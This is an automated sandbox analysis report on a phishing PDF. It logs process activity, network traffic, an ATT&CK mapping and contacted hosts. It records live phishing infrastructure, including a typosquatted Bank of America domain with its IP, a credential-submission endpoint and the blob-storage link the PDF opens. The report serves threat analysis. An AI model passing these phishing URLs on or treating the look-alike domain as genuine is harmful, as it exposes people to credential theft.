Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60820
Source: unknown	Network traffic detected: HTTP traffic on port 60887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60940
Source: unknown	Network traffic detected: HTTP traffic on port 60800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60718
Source: unknown	Network traffic detected: HTTP traffic on port 60980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60959
Source: unknown	Network traffic detected: HTTP traffic on port 60961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60950
Source: unknown	Network traffic detected: HTTP traffic on port 60968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60837
Source: unknown	Network traffic detected: HTTP traffic on port 60926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60952
Source: unknown	Network traffic detected: HTTP traffic on port 60737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60728
Source: unknown	Network traffic detected: HTTP traffic on port 60748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60845
Source: unknown	Network traffic detected: HTTP traffic on port 60904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60962
Source: unknown	Network traffic detected: HTTP traffic on port 60716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60907
Source: unknown	Network traffic detected: HTTP traffic on port 60960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60906
Source: unknown	Network traffic detected: HTTP traffic on port 60820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60905
Source: unknown	Network traffic detected: HTTP traffic on port 60937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60904
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60903
Source: unknown	Network traffic detected: HTTP traffic on port 60866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60902
Source: unknown	Network traffic detected: HTTP traffic on port 60795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60918
Source: unknown	Network traffic detected: HTTP traffic on port 60959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60915
Source: unknown	Network traffic detected: HTTP traffic on port 60936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60913
Source: unknown	Network traffic detected: HTTP traffic on port 60903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60912
Source: unknown	Network traffic detected: HTTP traffic on port 60794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60911
Source: unknown	Network traffic detected: HTTP traffic on port 60888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60910
Source: unknown	Network traffic detected: HTTP traffic on port 60899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60926
Source: unknown	Network traffic detected: HTTP traffic on port 60914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60924
Source: unknown	Network traffic detected: HTTP traffic on port 60925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60921
Source: unknown	Network traffic detected: HTTP traffic on port 61016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60920
Source: unknown	Network traffic detected: HTTP traffic on port 60738 -> 443

Source: chromecache_526.15.dr

OLE indicator, VBA macros: true

Source: chromecache_526.15.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal56.phis.winPDF@39/424@31/12

Source: DEEZI80S.pdf

Initial sample: https://connectauthentication.blob.core.windows.net/open/complete.html?h9dhy

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.2264

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-15 11-43-09-368.log

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\DEEZI80S.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1588 --field-trial-handle=1568,i,17243078238320737959,17368587101676185686,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://connectauthentication.blob.core.windows.net/open/complete.html?h9dhy
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1852,i,3534187721205768075,1816576997033915686,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://connectauthentication.blob.core.windows.net/open/complete.html?h9dhy	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1588 --field-trial-handle=1568,i,17243078238320737959,17368587101676185686,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1852,i,3534187721205768075,1816576997033915686,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: DEEZI80S.pdf	Initial sample: PDF keyword /JS count = 0
Source: DEEZI80S.pdf	Initial sample: PDF keyword /JavaScript count = 0

Source: DEEZI80S.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	1 Drive-by Compromise	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	3 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Spearphishing Link	Scheduled Task/Job	2 Scripting	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DEEZI80S.pdf	3%	Virustotal		Browse

Source	Detection	Scanner	Label
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd.png	0%	Avira URL Cloud	safe
https://d30y9cdsu7xlg0.cloudfront.net/png/29715-200.png	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/BOA.PNG	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/BofA_rgb.png	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/submit.php	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/	0%	Avira URL Cloud	safe
https://storage.mtls.cloud.google.com/	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/sign-in-sprite.png	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/online-id-vipaa-module-enter-skin.js	0%	Avira URL Cloud	safe
https://docs.virustotal.com/reference/overview	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd-hover.png	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/onetrust-style.css	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/gfootb-static-sprite.png	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/special/js/main.js	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/favicon.ico	0%	Avira URL Cloud	safe
http://docs.jquery.com/Plugins/Validation	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/error-large.gif	0%	Avira URL Cloud	safe
https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
online.access.secure.bankofamerlica.com	188.119.66.154	true	false	high
plus.l.google.com	142.250.186.78	true	false	high
play.google.com	172.217.18.14	true	false	high
virustotal.com	216.239.36.21	true	false	high
www.recaptcha.net	142.250.186.163	true	false	high
www.google.com	142.250.184.228	true	false	high
recaptcha.net	142.250.184.195	true	false	high
www.virustotal.com	34.54.88.138	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.virustotal.com/gui/36980.df97ec20ffdaef039122.js	false		high
https://www.virustotal.com/gui/2576.04847b50f85afec0428e.js	false		high
https://www.virustotal.com/gui/75927.802a112711bbd5680929.js	false		high
https://www.virustotal.com/gui/11806.d81fcce120eb3a4dc377.js	false		high
https://www.virustotal.com/gui/	false		high
https://www.virustotal.com/gui/64630.e2a960dcb01f67dbff23.js	false		high
https://www.virustotal.com/gui/1402accbefdec6a25762.woff2	false		high
https://www.virustotal.com/gui/26044.08a4c6e2ccb49f01ee08.js	false		high
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd.png	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/assets/online-id-vipaa-module-enter-skin.js	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/assets/BofA_rgb.png	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/submit.php	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/32827.e9df234ac022e0ec6707.js	false		high
https://www.virustotal.com/gui/25390.cc03726ca6fe66c5a420.js	false		high
https://www.virustotal.com/gui/84569.39d023e39066ad66391e.js	false		high
https://online.access.secure.bankofamerlica.com/assets/BOA.PNG	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/assets/sign-in-sprite.png	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/ui/user_notifications	false		high
https://www.virustotal.com/gui/33274.0c0f27619a6630c5840a.js	false		high
https://www.virustotal.com/ui/cookie_disclaimer	false		high
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd-hover.png	false	Avira URL Cloud: safe	unknown
https://online.access.secure.bankofamerlica.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/66587.25f73431adda110b0a5d.js	false		high
https://online.access.secure.bankofamerlica.com/assets/onetrust-style.css	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/53819.2a1d6d2aed818366d95f.js	false		high
https://www.google.com/js/bg/CY4IdQ8PNOqs9ugPxTaJh2hYWy8m1lFu__OIecPWn-w.js	false		high
https://www.virustotal.com/gui/63143.b5130a91280bec20fe15.js	false		high
https://www.virustotal.com/gui/81735.0c559957aa77895a80b6.js	false		high
https://online.access.secure.bankofamerlica.com/assets/error-large.gif	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/47031.059aa26916e6bb9fe21d.js	false		high
https://www.virustotal.com/gui/2121f4aabac6fbe523ec.woff2	false		high
https://www.virustotal.com/ui/signin?relationships=groups%2Cparent_group	false		high
https://www.virustotal.com/gui/58686.f1ac5a4a1e085aafcbb6.js	false		high
https://www.virustotal.com/gui/vt-ui-sw-installer.3166763520a2b299ee12.js	false		high
https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.js	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/36018.11aa4f9261da1e45e451.js	false		high
https://www.virustotal.com/gui/49272.372a1ed11135b11cd4f7.js	false		high
https://recaptcha.net/recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF	false		high
https://online.access.secure.bankofamerlica.com/assets/special/js/main.js	false	Avira URL Cloud: safe	unknown
https://www.virustotal.com/gui/56053.5e8324e3c0b62ad10cdf.js	false		high
https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	true		unknown
https://www.virustotal.com/gui/67734.4208bb6d5a03af5395e6.js	false		high
https://www.virustotal.com/gui/static/qrcode.min.js	false		high
https://www.virustotal.com/gui/25924.b3a6356de76617e73c99.js	false		high
https://www.virustotal.com/gui/static/opensearch.xml	false		high
https://www.virustotal.com/gui/main.88da91eb4efdde76ebe0.js	false		high
https://www.virustotal.com/gui/5978.8367bb052a47f57e9d55.js	false		high
https://www.virustotal.com/gui/88116.6518b1d1356f23e2144b.js	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://online.access.secure.bankofamerlica.com/assets/gfootb-static-sprite.png	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stats.g.doubleclick.net/g/collect	chromecache_324.15.dr, chromecache_373.15.dr, chromecache_490.15.dr, chromecache_343.15.dr	false		high
https://storage.mtls.cloud.google.com/	chromecache_417.15.dr, chromecache_351.15.dr	false	Avira URL Cloud: safe	unknown
https://developers.google.com/recaptcha/docs/faq#localhost_support	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://secure.opinionlab.com/ccc01/comment_card_d.asp?	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://secure.opinionlab.com/ccc01/comment_card_d.asp	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://www.virustotal.com/gui/search/	chromecache_366.15.dr	false		high
https://ampcid.google.com/v1/publisher:getClientId	chromecache_319.15.dr, chromecache_410.15.dr	false		high
